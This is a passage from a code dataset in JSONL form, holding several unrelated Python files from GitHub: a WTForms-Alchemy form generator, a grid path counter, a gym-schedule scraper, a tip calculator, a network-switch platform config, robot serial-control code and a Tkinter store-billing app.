IntIntervalField),\n (types.NumericRangeType, DecimalIntervalField),\n (types.PasswordType, PasswordField),\n (types.PhoneNumberType, PhoneNumberField),\n (types.ScalarListType, StringField),\n (types.URLType, StringField),\n (types.UUIDType, StringField),\n (types.WeekDaysType, WeekDaysField),\n ))\n\n WIDGET_MAP = OrderedDict((\n (BooleanField, CheckboxInput),\n (ColorField, ColorInput),\n (DateField, DateInput),\n (DateTimeField, DateTimeInput),\n (DateTimeLocalField, DateTimeLocalInput),\n (DecimalField, NumberInput),\n (EmailField, EmailInput),\n (FloatField, NumberInput),\n (IntegerField, NumberInput),\n (TextAreaField, TextArea),\n (TimeField, TimeInput),\n (StringField, TextInput)\n ))\n\n def __init__(self, form_class):\n \"\"\"\n Initializes the form generator\n\n :param form_class: ModelForm class to be used as the base of generation\n process\n \"\"\"\n self.form_class = form_class\n self.model_class = self.form_class.Meta.model\n self.meta = self.form_class.Meta\n self.TYPE_MAP.update(self.form_class.Meta.type_map)\n\n def create_form(self, form):\n \"\"\"\n Creates the form.\n\n :param form: ModelForm instance\n \"\"\"\n attrs = OrderedDict()\n for key, property_ in sa.inspect(self.model_class).attrs.items():\n if not isinstance(property_, ColumnProperty):\n continue\n if self.skip_column_property(property_):\n continue\n attrs[key] = property_\n\n for attr in translated_attributes(self.model_class):\n attrs[attr.key] = attr.property\n\n return self.create_fields(form, self.filter_attributes(attrs))\n\n def filter_attributes(self, attrs):\n \"\"\"\n Filter set of model attributes based on only, exclude and include\n meta parameters.\n\n :param attrs: Set of attributes\n \"\"\"\n if self.meta.only:\n attrs = OrderedDict([\n (key, prop)\n for key, prop in map(self.validate_attribute, self.meta.only)\n if key\n ])\n else:\n if self.meta.include:\n attrs.update([\n (key, prop)\n for key, prop\n in map(self.validate_attribute, self.meta.include)\n if key\n ])\n\n if self.meta.exclude:\n for key in self.meta.exclude:\n try:\n del attrs[key]\n except KeyError:\n if self.meta.attr_errors:\n raise InvalidAttributeException(key)\n return attrs\n\n def validate_attribute(self, attr_name):\n \"\"\"\n Finds out whether or not given sqlalchemy model attribute name is\n valid. Returns attribute property if valid.\n\n :param attr_name: Attribute name\n \"\"\"\n try:\n attr = getattr(self.model_class, attr_name)\n except AttributeError:\n try:\n translation_class = (\n self.model_class.__translatable__['class']\n )\n attr = getattr(translation_class, attr_name)\n except AttributeError:\n if self.meta.attr_errors:\n raise InvalidAttributeException(attr_name)\n else:\n return None, None\n try:\n if not isinstance(attr.property, ColumnProperty):\n if self.meta.attr_errors:\n raise InvalidAttributeException(attr_name)\n else:\n return None, None\n except AttributeError:\n raise AttributeTypeException(attr_name)\n return attr_name, attr.property\n\n def create_fields(self, form, properties):\n \"\"\"\n Creates fields for given form based on given model attributes.\n\n :param form: form to attach the generated fields into\n :param attributes: model attributes to generate the form fields from\n \"\"\"\n for key, prop in properties.items():\n column = prop.columns[0]\n try:\n field = self.create_field(prop, column)\n except UnknownTypeException:\n if not self.meta.skip_unknown_types:\n raise\n else:\n continue\n\n if not hasattr(form, key):\n setattr(form, key, field)\n\n def skip_column_property(self, column_property):\n \"\"\"\n Whether or not to skip column property in the generation process.\n\n :param column_property: SQLAlchemy ColumnProperty object\n \"\"\"\n if column_property._is_polymorphic_discriminator:\n return True\n\n return self.skip_column(column_property.columns[0])\n\n def skip_column(self, column):\n \"\"\"\n Whether or not to skip column in the generation process.\n\n :param column_property: SQLAlchemy Column object\n \"\"\"\n if not self.meta.include_foreign_keys and column.foreign_keys:\n return True\n\n if not self.meta.include_primary_keys and column.primary_key:\n return True\n\n if (not self.meta.include_datetimes_with_default and\n isinstance(column.type, sa.types.DateTime) and\n column.default):\n return True\n\n if isinstance(column.type, types.TSVectorType):\n return True\n\n if self.meta.only_indexed_fields and not self.has_index(column):\n return True\n\n # Skip all non columns (this is the case when using column_property\n # methods).\n if not isinstance(column, sa.Column):\n return True\n\n return False\n\n def has_index(self, column):\n \"\"\"\n Whether or not given column has an index.\n\n :param column: Column object to inspect the indexes from\n \"\"\"\n if column.primary_key or column.foreign_keys:\n return True\n table = column.table\n for index in table.indexes:\n if len(index.columns) == 1 and column.name in index.columns:\n return True\n return False\n\n def create_field(self, prop, column):\n \"\"\"\n Create form field for given column.\n\n :param prop: SQLAlchemy ColumnProperty object.\n :param column: SQLAlchemy Column object.\n \"\"\"\n kwargs = {}\n field_class = self.get_field_class(column)\n kwargs['default'] = self.default(column)\n kwargs['validators'] = self.create_validators(prop, column)\n kwargs['filters'] = self.filters(column)\n kwargs.update(self.type_agnostic_parameters(prop.key, column))\n kwargs.update(self.type_specific_parameters(column))\n if prop.key in self.meta.field_args:\n kwargs.update(self.meta.field_args[prop.key])\n\n if issubclass(field_class, DecimalField):\n if hasattr(column.type, 'scale'):\n kwargs['places'] = column.type.scale\n field = field_class(**kwargs)\n return field\n\n def default(self, column):\n \"\"\"\n Return field default for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if column.default and is_scalar(column.default.arg):\n return column.default.arg\n else:\n if not column.nullable:\n return self.meta.default\n\n def filters(self, column):\n \"\"\"\n Return filters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n should_trim = column.info.get('trim', None)\n filters = column.info.get('filters', [])\n if (\n (\n isinstance(column.type, sa.types.String) and\n self.meta.strip_string_fields and\n should_trim is None\n ) or\n should_trim is True\n ):\n filters.append(strip_string)\n return filters\n\n def date_format(self, column):\n \"\"\"\n Returns date format for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n isinstance(column.type, sa.types.DateTime) or\n isinstance(column.type, types.ArrowType)\n ):\n return self.meta.datetime_format\n\n if isinstance(column.type, sa.types.Date):\n return self.meta.date_format\n\n def type_specific_parameters(self, column):\n \"\"\"\n Returns type specific parameters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n if (\n hasattr(column.type, 'enums') or\n column.info.get('choices') or\n isinstance(column.type, types.ChoiceType)\n ):\n kwargs.update(self.select_field_kwargs(column))\n\n date_format = self.date_format(column)\n if date_format:\n kwargs['format'] = date_format\n\n if hasattr(column.type, 'region'):\n kwargs['region'] = column.type.region\n\n kwargs['widget'] = self.widget(column)\n return kwargs\n\n def widget(self, column):\n \"\"\"\n Returns WTForms widget for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n widget = column.info.get('widget', None)\n if widget is not None:\n return widget\n\n kwargs = {}\n\n step = column.info.get('step', None)\n if step is not None:\n kwargs['step'] = step\n else:\n if isinstance(column.type, sa.types.Numeric):\n if (\n column.type.scale is not None and\n not column.info.get('choices')\n ):\n kwargs['step'] = self.scale_to_step(column.type.scale)\n\n if kwargs:\n widget_class = self.WIDGET_MAP[\n self.get_field_class(column)\n ]\n return widget_class(**kwargs)\n\n def scale_to_step(self, scale):\n \"\"\"\n Returns HTML5 compatible step attribute for given decimal scale.\n\n :param scale: an integer that defines a Numeric column's scale\n \"\"\"\n return str(pow(Decimal('0.1'), scale))\n\n def type_agnostic_parameters(self, key, column):\n \"\"\"\n Returns all type agnostic form field parameters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n kwargs['description'] = column.info.get('description', '')\n kwargs['label'] = column.info.get('label', key)\n return kwargs\n\n def select_field_kwargs(self, column):\n \"\"\"\n Returns key value args for SelectField based on SQLAlchemy column\n definitions.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n kwargs['coerce'] = self.coerce(column)\n if isinstance(column.type, types.ChoiceType):\n choices = column.type.choices\n if (\n Enum is not None and\n isinstance(choices, type)\n and issubclass(choices, Enum)\n ):\n kwargs['choices'] = [\n (choice.value, str(choice)) for choice in choices\n ]\n else:\n kwargs['choices'] = choices\n elif 'choices' in column.info and column.info['choices']:\n kwargs['choices'] = column.info['choices']\n else:\n kwargs['choices'] = [\n (enum, enum) for enum in column.type.enums\n ]\n return kwargs\n\n def coerce(self, column):\n \"\"\"\n Returns coerce callable for given column\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if 'coerce' in column.info:\n return column.info['coerce']\n if isinstance(column.type, types.ChoiceType):\n return choice_type_coerce_factory(column.type)\n try:\n python_type = column.type.python_type\n except NotImplementedError:\n return null_or_unicode\n\n if column.nullable and issubclass(python_type, str):\n return null_or_unicode\n return python_type\n\n def create_validators(self, prop, column):\n \"\"\"\n Returns validators for given column\n\n :param column: SQLAlchemy Column object\n \"\"\"\n validators = [\n self.required_validator(column),\n self.length_validator(column),\n self.unique_validator(prop.key, column),\n self.range_validator(column)\n ]\n if isinstance(column.type, types.EmailType):\n validators.append(self.get_validator('email'))\n if isinstance(column.type, types.URLType):\n validators.append(self.get_validator('url'))\n validators = flatten([v for v in validators if v is not None])\n\n validators.extend(self.additional_validators(prop.key, column))\n return validators\n\n def required_validator(self, column):\n \"\"\"\n Returns required / optional validator for given column based on column\n nullability and form configuration.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (not self.meta.all_fields_optional and\n not column.default and\n not column.nullable):\n\n type_map = self.meta.not_null_validator_type_map\n try:\n return type_map[column.type]\n except KeyError:\n if isinstance(column.type, sa.types.TypeDecorator):\n type_ = column.type.impl\n\n try:\n return type_map[type_]\n except KeyError:\n pass\n if self.meta.not_null_validator is not None:\n return self.meta.not_null_validator\n return self.get_validator('optional')\n\n def get_validator(self, name, **kwargs):\n attr_name = '%s_validator' % name\n attr = getattr(self.meta, attr_name)\n if attr is None:\n return attr\n\n return attr(**kwargs)\n\n def additional_validators(self, key, column):\n \"\"\"\n Returns additional validators for given column\n\n :param key: String key of the column property\n :param column: SQLAlchemy Column object\n \"\"\"\n validators = []\n if key in self.meta.validators:\n try:\n validators.extend(self.meta.validators[key])\n except TypeError:\n validators.append(self.meta.validators[key])\n\n if 'validators' in column.info and column.info['validators']:\n try:\n validators.extend(column.info['validators'])\n except TypeError:\n validators.append(column.info['validators'])\n return validators\n\n def unique_validator(self, key, column):\n \"\"\"\n Returns unique validator for given column if column has a unique index\n\n :param key: String key of the column property\n :param column: SQLAlchemy Column object\n \"\"\"\n if column.unique:\n return self.get_validator(\n 'unique',\n column=getattr(self.model_class, key),\n get_session=self.form_class.get_session\n )\n\n def range_validator(self, column):\n \"\"\"\n Returns range validator based on column type and column info min and\n max arguments\n\n :param column: SQLAlchemy Column object\n \"\"\"\n min_ = column.info.get('min')\n max_ = column.info.get('max')\n\n if min_ is not None or max_ is not None:\n if is_number(column.type) or is_number_range(column.type):\n return self.get_validator('number_range', min=min_, max=max_)\n elif is_date_column(column):\n return self.get_validator('date_range', min=min_, max=max_)\n elif isinstance(column.type, sa.types.Time):\n return self.get_validator('time_range', min=min_, max=max_)\n\n def length_validator(self, column):\n \"\"\"\n Returns length validator for given column\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n isinstance(column.type, sa.types.String) and\n hasattr(column.type, 'length') and\n column.type.length\n ):\n return self.get_validator('length', max=column.type.length)\n\n def get_field_class(self, column):\n \"\"\"\n Returns WTForms field class. Class is based on a custom field class\n attribute or SQLAlchemy column type.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n 'form_field_class' in column.info and\n column.info['form_field_class']\n ):\n return column.info['form_field_class']\n if 'choices' in column.info and column.info['choices']:\n return SelectField\n if (\n column.type not in self.TYPE_MAP and\n isinstance(column.type, sa.types.TypeDecorator)\n ):\n check_type = column.type.impl\n else:\n check_type = column.type\n\n try:\n column_type = self.TYPE_MAP[check_type]\n\n if inspect.isclass(column_type) and issubclass(column_type, Field):\n return column_type\n else:\n return column_type(column)\n except KeyError:\n raise UnknownTypeException(column)\n","repo_name":"kvesteri/wtforms-alchemy","sub_path":"wtforms_alchemy/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":20142,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"27"} +{"seq_id":"71534559433","text":"def count_paths(F):\n\n # initialize the size, and two memorization tables, T and T2\n\n n = len(F)\n T = [[0 for i in range(n)] for i in range(n)]\n T2 = [[0 for i in range(n)] for i in range(n)]\n\n # base case (at T[-1][-1])\n # if there is a mushroom, we should add it, otherwise it should be blank (given there is a path)\n if F[-1][-1] == \"m\":\n\n T[-1][-1] = 1\n\n # base case for T2, where there exists a path\n T2[-1][-1] = 1\n\n # loop through all n^2 elements in T and T2, where T[-y][-x] and T2[-y][-x] represents the value at (-x, -y) respectively\n for y in range(1, n + 1):\n\n for x in range(1, n + 1):\n\n # ignore (-1, -1) since we defined base case\n if x == 1 and y == 1:\n continue\n\n # if we are at bottom row or right-most column, the elements below and the elements to the right respectively, should not exist (so defined as -inf)\n if x == 1:\n right = -float(\"inf\")\n else:\n right = T[-y][-x + 1]\n if y == 1:\n down = -float(\"inf\")\n else:\n down = T[-y + 1][-x]\n\n tile = F[-y][-x] # define tile\n\n # depending on if the tile is a tree, mushroom, or blank\n if tile == \"t\":\n T[-y][-x] = -float(\"inf\")\n if tile == \"m\":\n T[-y][-x] = 1 + max(right, down)\n if tile == \"x\":\n T[-y][-x] = max(right, down)\n\n # solving for T2 is defined as if down and right are the same value, then that must mean there exists another path to the end\n if right == down and down != -float(\"inf\"):\n\n T2[-y][-x] = T2[-y][-x + 1] + T2[-y + 1][-x]\n else:\n\n # finds which direction is the max mushroom direction\n mushrooms = max(right, down)\n if right == mushrooms:\n\n T2[-y][-x] = T2[-y][-x + 1]\n else:\n\n T2[-y][-x] = T2[-y + 1][-x]\n\n return T2[0][0]\n","repo_name":"Twigums/6.006","sub_path":"count_paths.py","file_name":"count_paths.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25299948185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 14 21:44:26 2022\r\n\r\n@author: Johnny Tsao\r\n\"\"\"\r\n\r\nimport requests\r\nimport urllib.request\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\n\r\nurl = 'https://www.utrecsports.org/facilities/facility-schedules'\r\nresponse = requests.get(url)\r\n\r\nsoup = BeautifulSoup(response.content,\"html.parser\")\r\ntables = soup.find_all(\"table\")\r\nrows = []\r\nfor row in tables[1].findAll(\"tr\"):\r\n cols = []\r\n for col in row.findAll(\"td\"):\r\n cols.append(col.text)\r\n rows.append(cols)\r\n \r\ndays = []\r\ngym = \"\"\r\ndata = []\r\n\r\ntextfile = open(\"data.txt\",\"w\")\r\n\r\nfor cols in rows:\r\n if(len(cols) == 1):\r\n title = cols[0]\r\n if(len(title) < 10):\r\n gym = title\r\n else:\r\n days.append(title)\r\n if(len(cols) == 3):\r\n string = cols[2]\r\n elem =string.split(\" \")\r\n search_word = 'Informal Rec Badminton'\r\n if(string[:len(search_word)] == 'Informal Rec Badminton'):\r\n print(days[-1], cols[1])\r\n print(gym, cols[0])\r\n data.append([days[-1] + \" \" + cols[1],\r\n gym + \" \" + cols[0]])\r\n textfile.write(\"{:25s} {:15s} {:5s} {:15s} \\n\"\\\r\n .format(days[-1], cols[1], gym,cols[0]))\r\n print(\" \")\r\n \r\ntextfile.close()\r\n \r\n","repo_name":"Johnny880724/UT_REC","sub_path":"UT_REC_download.py","file_name":"UT_REC_download.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16361898635","text":"#get number value\n#display \"tip values\" of 15% and 20%\n\nprint(\"Harro, please tell me a fictional bill amount:\")\nbase = float(input())\n\ntip_15 = base*0.15\ntip_20 = base*0.20\ntip_total_15 = base+tip_15\ntip_total_20 = base+tip_20\n\nprint()\nprint(\"Ok, so 15% of\", base, \"is\", tip_15, \"and 20% would be\", tip_20,\".\")\nprint(\"Therefor I recommend that you pay between\", tip_total_15, \"and\",\\\n tip_total_20, \"in total!\")\n\n","repo_name":"PunkIslamist/Python-for-the-absolute-beginner","sub_path":"challenge_2_3.py","file_name":"challenge_2_3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27388956451","text":"from onl.platform.base import *\r\nfrom onl.platform.netberg import *\r\n\r\nclass OnlPlatform_x86_64_netberg_aurora_610_r0(OnlPlatformNetberg,\r\n OnlPlatformPortConfig_48x25_8x100):\r\n PLATFORM='x86-64-netberg-aurora-610-r0'\r\n MODEL=\"AURORA610\"\r\n SYS_OBJECT_ID=\".610.1\"\r\n\r\n def baseconfig(self):\r\n os.system(\"insmod /lib/modules/`uname -r`/onl/netberg/x86-64-netberg-aurora-610/gpio-ich.ko\")\r\n #self.insmod('gpio-ich.ko')\r\n self.insmod('i2c-gpio')\r\n self.insmod('net_platform')\r\n self.insmod('net_psoc')\r\n os.system(\"echo net_cpld 0x77 > /sys/bus/i2c/devices/i2c-0/new_device\")\r\n self.insmod('net_cpld')\r\n self.insmod('swps')\r\n self.insmod('vpd')\r\n os.system(\"/lib/platform-config/x86-64-netberg-aurora-610-r0/onl/healthstatus.sh &\")\r\n\r\n return True\r\n\r\n","repo_name":"opencomputeproject/OpenNetworkLinux","sub_path":"packages/platforms/netberg/x86-64/aurora-610/platform-config/r0/src/python/x86_64_netberg_aurora_610_r0/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":532,"dataset":"github-code","pt":"27"} +{"seq_id":"17299304640","text":"\"\"\"Video - Right Motor.\"\"\"\nimport sys\nimport serial\nimport time\nfrom leftmotortest import moveLeftMotor\nfrom rightmotortest import moveRightMotor\nfrom motorstest import moveMotors\nfrom pebbletest import movePebbles\nfrom ledtest import ledOn\nfrom changeData import changeData\n\n# Serial setup\nser = serial.Serial('/dev/ttyACM0', 115200)\nif ser.isOpen() is False:\n ser.open()\ntime.sleep(2)\nsend.put(\"got connection\")\n\n#flag = {\"leftmotor\": \"open\", \"rightmotor\": \"open\", \"pebbles\": \"None\"}\n\nwhile True:\n if ser.isOpen() is False:\n ser.open()\n msg = str((ser.readline()).decode(\"utf-8\"))\n msg = msg[0:len(msg)-2].split(',')\n ser.flush()\n if msg[0] == \"P\":\n send.put(\"pressure \" + msg[1])\n send.put(\"tempPS \" + msg[2])\n send.put(\"gyro \" + msg[3] + \" \" + msg[4] + \" \" + msg[5])\n send.put(\"accel \" + msg[6] + \" \" + msg[7] + \" \" + msg[8])\n send.put(\"tempIMU \" + msg[9])\n elif msg[0] == \"S\":\n send.put(\"temp \" + msg[1])\n send.put(\"metal \" + msg[2])\n send.put(\"ph \" + msg[3])\n \n #print(\"gyro \" + msg[0] + \" \" + msg[1] + \" \" + msg[2])\n if flag[\"leftmotor\"] == \"open\" and flag[\"rightmotor\"] == \"open\":\n moveMotors(ser, \"open\")\n flag[\"leftmotor\"] = \"None\"\n flag[\"rightmotor\"] = \"None\"\n elif flag[\"leftmotor\"] == \"close\" and flag[\"rightmotor\"] == \"close\":\n moveMotors(ser, \"close\")\n flag[\"leftmotor\"] = \"None\"\n flag[\"rightmotor\"] = \"None\"\n elif flag[\"leftmotor\"] != \"None\":\n moveLeftMotor(ser, flag[\"leftmotor\"])\n flag[\"leftmotor\"] = \"None\"\n elif flag[\"rightmotor\"] != \"None\":\n moveRightMotor(ser, flag[\"rightmotor\"])\n flag[\"rightmotor\"] = \"None\"\n if flag[\"pebbles\"] != \"None\":\n movePebbles(ser, flag[\"pebbles\"])\n flag[\"pebbles\"] = \"None\"\n if flag[\"led\"] != \"None\":\n ledOn(ser, flag[\"led\"])\n flag[\"led\"] = \"None\"\n if flag[\"sensors\"] != \"None\":\n changeData(ser, flag[\"sensors\"])\n flag[\"sensors\"] = \"None\"\n #print(flag)\n #send.put(directions[0] + directions[1] + directions[2])\n","repo_name":"EasternEdgeRobotics/Software_2019","sub_path":"raspi-4/serialComm.py","file_name":"serialComm.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17162778969","text":"from tkinter import *\nimport sqlite3\nimport tkinter.messagebox\nimport datetime\nimport math\nimport os\nimport random\n\n#conn = sqlite3.connect('E:\\Projects\\Python\\Store Management Software\\Database\\store.db')\nconn = sqlite3.connect('store.db')\n\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS `transactions` ( `id`\tINTEGER PRIMARY KEY AUTOINCREMENT, `product_name`\tTEXT,\"\n \"`quantity`\tINTEGER, `amount`\tINTEGER, `date`\tTEXT);\")\ndate = datetime.datetime.now().date()\nproduct_list = []\nproduct_quantity = []\nproduct_price = []\nproduct_id = []\n\nlabels_list = []\n\n\nclass Application:\n def __init__(self, master, *args, **kwargs):\n\n self.chaneisThere = 1\n\n self.master = master\n self.left = Frame(master, width=700, height=768, bg='white')\n self.left.pack(side=LEFT)\n\n self.right = Frame(master, width=666, height=768, bg='lightblue')\n self.right.pack(side=RIGHT)\n\n self.heading = Label(self.left, text='Store Management', font=('arial 40 bold'), bg='white')\n self.heading.place(x=0, y=0)\n\n self.date_1 = Label(self.right, text=\"Today's Date: \" + str(date), font=('arial 16 bold'), bg='lightblue')\n self.date_1.place(x=0, y=0)\n\n self.tproduct = Label(self.right, text=\"Products\", font=('arial 19 bold'), bg='lightblue')\n self.tproduct.place(x=0, y=60)\n\n self.tquantity = Label(self.right, text=\"Quantity\", font=('arial 19 bold'), bg='lightblue')\n self.tquantity.place(x=300, y=60)\n\n self.tamount = Label(self.right, text=\"Amount\", font=('arial 19 bold'), bg='lightblue')\n self.tamount.place(x=500, y=60)\n\n self.enterid = Label(self.left, text='Enter ID', font=('arial 18 bold'), bg='white')\n self.enterid.place(x=0, y=80)\n\n self.enteride = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.enteride.place(x=190, y=80)\n self.enteride.focus()\n\n\n self.search_btn = Button(self.left, text='Search', width=22, height=2, bg='orange', command=self.ajax)\n self.search_btn.place(x=350, y=120)\n\n self.productname = Label(self.left, text='', font=('arial 18 bold'), bg='white', fg='steelblue')\n self.productname.place(x=0, y=250)\n\n self.pprice = Label(self.left, text='', font=('arial 18 bold'), bg='white', fg='steelblue')\n self.pprice.place(x=0, y=290)\n\n self.total_label = Label(self.right, text='', font=('arial 40 bold'), bg='lightblue', fg='white')\n self.total_label.place(x=0, y=600)\n\n self.master.bind(\"\", self.ajax)\n self.master.bind(\"\", self.ajax)\n self.master.bind(\"\", self.generate_bill)\n\n\n\n def ajax(self, *args, **kwargs):\n self.get_id = self.enteride.get()\n query = \"SELECT * FROM inventory WHERE id=?\"\n result = c.execute(query, (self.get_id,))\n for self.r in result:\n self.get_id = self.r[0]\n self.get_name = self.r[1]\n self.get_price = self.r[4]\n self.get_stock = self.r[2]\n self.productname.configure(text=\"Product's Name: \" + str(self.get_name))\n self.pprice.configure(text=\"Price: \" + str(self.get_price))\n\n self.quantity_1 = Label(self.left, text='Enter Quantity', font=('arial 18 bold'), bg='white')\n self.quantity_1.place(x=0, y=370)\n\n self.quantity_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.quantity_e.place(x=190, y=370)\n self.quantity_e.focus()\n\n self.discount_1 = Label(self.left, text='Enter Discount', font=('arial 18 bold'), bg='white')\n self.discount_1.place(x=0, y=410)\n\n self.discount_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.discount_e.place(x=190, y=410)\n self.discount_e.insert(END, 0)\n\n self.add_to_btn = Button(self.left, text='Add To Cart', width=22, height=2, bg='orange',\n command=self.add_to_cart)\n self.add_to_btn.place(x=350, y=450)\n\n self.change_1 = Label(self.left, text='Given Amount', font=('arial 18 bold'), bg='white')\n self.change_1.place(x=0, y=550)\n\n self.change_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.change_e.place(x=190, y=550)\n\n self.change_butn = Button(self.left, text='Calculate Change', width=22, height=2, bg='orange', command=self.change)\n self.change_butn.place(x=350, y=590)\n\n #generate bill\n self.bill_btn = Button(self.left, text='Generate Bill', width=100, height=2, bg='red', fg='white', command=self.generate_bill)\n self.bill_btn.place(x=0, y=640)\n\n def add_to_cart(self, *args, **kwargs):\n self.quantity_value = int(self.quantity_e.get())\n if self.quantity_value > int(self.get_stock):\n tkinter.messagebox.showinfo(\"Out of Stock\", \"Less in Stocks.\")\n else:\n self.final_price = float(self.quantity_value)*float(self.get_price) - (float(self.discount_e.get()))\n product_list.append(self.get_name)\n product_price.append(self.final_price)\n product_quantity.append(self.quantity_value)\n product_id.append(self.get_id)\n\n self.x_index = 0\n self.y_index = 100\n self.counter = 0\n for self.p in product_list:\n self.tempName = Label(self.right, text=str(product_list[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempName.place(x=0, y=self.y_index)\n labels_list.append(self.tempName)\n\n self.tempqt = Label(self.right, text=str(product_quantity[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempqt.place(x=300, y=self.y_index)\n labels_list.append(self.tempqt)\n\n\n self.tempprice = Label(self.right, text=str(product_price[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempprice.place(x=500, y=self.y_index)\n labels_list.append(self.tempprice)\n\n\n\n self.y_index += 40\n self.counter += 1\n\n self.total_label.configure(text=\"Total: Rs= \"+str(sum(product_price)))\n\n self.quantity_1.place_forget()\n self.quantity_e.place_forget()\n self.discount_1.place_forget()\n self.discount_e.place_forget()\n\n self.productname.configure(text='')\n self.pprice.configure(text='')\n self.add_to_btn.destroy()\n\n self.enteride.focus()\n self.enteride.delete(0, END)\n\n def change(self, *args, **kwargs):\n self.amount_given = float(self.change_e.get())\n self.our_total = float(sum(product_price))\n self.to_give = self.amount_given - self.our_total\n self.c_ammount = Label(self.left, text=\"Change: Rs= \" + str(self.to_give), font=('arial 18 bold'), fg='red', bg='white')\n self.c_ammount.place(x=0, y=600)\n self.chaneisThere = 0\n\n def generate_bill(self, *args, **kwargs):\n directory = \"C:/Projects/Python/Store Management Software/Invoice/\" + str(date) + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Template for Bill\n company = \"\\t\\t\\t\\tSagar Market Pvt. Ltd.\\n\"\n address = \"\\t\\t\\t\\tITER, SOA University, Jagamohan Nagar\\n\"\n phone = \"\\t\\t\\t\\t\\t0123456789\\n\"\n sample = \"\\t\\t\\t\\t\\tInvoice\\n\"\n dt = \"\\t\\t\\t\\t\\t\" + str(date)\n\n table_header = \"\\n\\n\\t\\t-----------------------------------------\\n\\t\\tSN.\\tProducts\\tQty\\tAmount\\n\\t\\t\" \\\n \"-----------------------------------------\"\n final = company + address + phone +sample + dt + \"\\n\" + table_header\n file_name = str(directory) + str(random.randrange(5000, 10000)) + \".rtf\"\n f = open(file_name, 'w')\n f.write(final)\n\n r=1\n i=0\n for t in product_list:\n f.write(\"\\n\\t\\t\" + str(r) + \"\\t\" + str(product_list[i] + \".......\")[:7] + \"\\t\" +\n str(product_quantity[i] )+ \"\\t\" + str(product_price[i]))\n i += 1\n r += 1\n f.write(\"\\n\\t\\t\\tTotal: Rs. \" + str(sum(product_price)))\n f.write(\"\\n\\t\\t\\tThanks for Visiting. \")\n\n os.startfile(file_name, \"print\") #PRINTING COMMAND LINE\n f.close()\n\n #decrease stocks\n self.x = 0\n\n initial = \"SELECT * FROM inventory WHERE id=?\"\n result = c.execute(initial, (product_id[self.x],))\n\n for i in product_list:\n for r in result:\n self.old_stock = r[2]\n\n self.new_stock = int(self.get_stock) - int(product_quantity[self.x])\n sql = \"UPDATE inventory SET stock=? WHERE id=?\"\n c.execute(sql,(self.new_stock, product_id[self.x]))\n conn.commit()\n\n sql2 = \"INSERT INTO transactions (product_name, quantity, amount, date) VALUES(?, ?, ?, ?)\"\n c.execute(sql2, (product_list[self.x], product_quantity[self.x], product_price[self.x], date))\n conn.commit()\n self.x += 1\n\n for a in labels_list:\n a.destroy()\n del(product_list[:])\n del(product_quantity[:])\n del(product_price[:])\n del(product_id[:])\n self.total_label.configure(text='')\n if self.chaneisThere == 0:\n self.c_ammount.configure(text='')\n self.change_e.delete(0, END)\n self.enteride.focus()\n\n tkinter.messagebox.showinfo(\"Success\", \"Happy Shopping\")\n\n\n\n\n\n\n\nroot = Tk()\nb = Application(root)\nroot.geometry('1368x768+0+0')\nroot.mainloop()","repo_name":"SagarPatra01/Python--based-Store-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"22670217635","text":"#-*- coding:utf-8 -*-\nfrom config import THE_ANTENNA_NUM,antenna_list,THE_RESTORE_NUM,THE_DATA_SOURCE\nimport os\ndef dataRestore(position):\n \"\"\"\n this func will be used to eliminate the strange value in the ph \n in the select sentences.\n use the last value in the list and the abs of the (last value - current value )\n is the boundy of the strange value.\n it's tough.\n And the file will be restore at the seq(means sequence )\n every 50 lines as a slot.\n postion is the last tell return value\n \"\"\"\n path = THE_DATA_SOURCE\n cwd = path.split('/')#get the current work directory\n mkdir = THE_DATA_SOURCE + 'seq'\n mkdir_matlab = THE_DATA_SOURCE + 'matlab'\n cleandata = []\n #print(mkdir) # It is used to check the mkdir path \n if os.path.exists(mkdir):\n pass # if the dir is exists\n else:\n os.mkdir(mkdir)\n os.mkdir(mkdir_matlab)\n #print(cwd,mkdir) #this is used to test the path\n for antnum in range(THE_ANTENNA_NUM):\n txt_name=['Fre920.625','Antenna2','Antenna3','Antenna4']\n txt_restore=['Antenna1','Antenna2','Antenna3','Antenna4']\n dir = path+txt_name[antnum]+'.txt'\n # print(dir) # this is used to test the file\n count = 0 # every 50 lines as a block\n with 